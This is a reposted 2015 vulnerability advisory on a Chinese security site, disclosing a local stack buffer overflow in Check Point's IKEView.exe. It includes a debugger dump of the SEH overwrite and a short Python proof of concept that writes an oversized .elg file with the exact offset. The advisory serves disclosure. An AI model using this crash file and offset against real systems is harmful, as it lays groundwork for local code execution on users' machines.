首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IKEView.exe Feature Pack NGX R60 - Build 591000004 Buffer Overflow
来源:hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2015-09-16  
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt



Vendor:
================================
www.checkpoint.com
http://pingtool.org/downloads/IKEView.exe



Product:
==================================================
IKEView.exe Feature Pack NGX R60 - Build 591000004

IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall 
phase(1 & 2) packets being exchanged with switches and gateways.

IKEVIEW is a Checkpoint Partner tool available for VPN troubleshooting purposes.
It is a Windows executable that can be downloaded from Checkpoint.com. 
This file parses the IKE.elg file located on the firewall.

To use IKEVIEW for VPN troubleshooting do the following:

1. From the checkpoint firewall type the following:

vpn debug ikeon

This will create the IKE.elg file located in $FWDIR/log


2. Attempt to establish the VPN tunnel. All phases of the connection will be logged to the IKE.elg file.


3. SCP the file to your local desktop.
WINSCP works great

4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file.




Vulnerability Type:
======================
Stack Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================
IKEView.exe is vulnerable to local stack based buffer overflow when parsing an malicious (internet key exchange) ".elg" file.
Vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after IKEView parses our malicious file, which may result then
result in arbitrary attacker supplied code execution.


0018F868  |41414141  AAAA
0018F86C  |01FC56D0  �V�  ASCII "File loaded in 47 minutes, 00 seconds."
0018F870  |41414141  AAAA
0018F874  |41414141  AAAA  Pointer to next SEH record
0018F878  |42424242  BBBB  SE handler
0018F87C  |00000002   ...


Quick Buffer Overflow POC :
===========================


1) Below python file to create POC save as .py it will generate POC file, open in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM!

seh="B"*4 #<----------will overwrite SEH with bunch of 42's HEX for 'B' ASCII char.

file="C:\\IKEView-buffer-overflow.elg"
x=open(file,"w")
payload="A"*4428+seh
x.write(payload)
x.close()

print "\n=======================================\n"
print " IKEView-buffer-overflow.elg file created\n"
print " hyp3rlinx ..."
print "=========================================\n"



Exploitation Technique:
=======================
Local



Severity Level:
=========================================================
High



Description:
==========================================================


Vulnerable Product:             [+] IKEView.exe Feature Pack NGX R60 - Build 591000004


Vulnerable File Type:           [+] .elg


Affected Area(s):               [+] Local OS


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IKEView.exe Fox Beta 1 Buffer
·TP-Link NC200/NC220 Cloud Came
·OpenLDAP 2.4.42 Denial Of Serv
·MS15-100 Microsoft Windows Med
·IBM AIX HACMP Privlege Escalat
·CMS Bolt File Upload Vulnerabi
·Disconnect.me 2.0 Local Root E
·MS15-078 Microsoft Windows Fon
·Android Stagefright - Remote C
·ManageEngine OpManager Remote
·PHP unserialize() Use-After-Fr
·IKEView.exe R60 - .elg Local S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved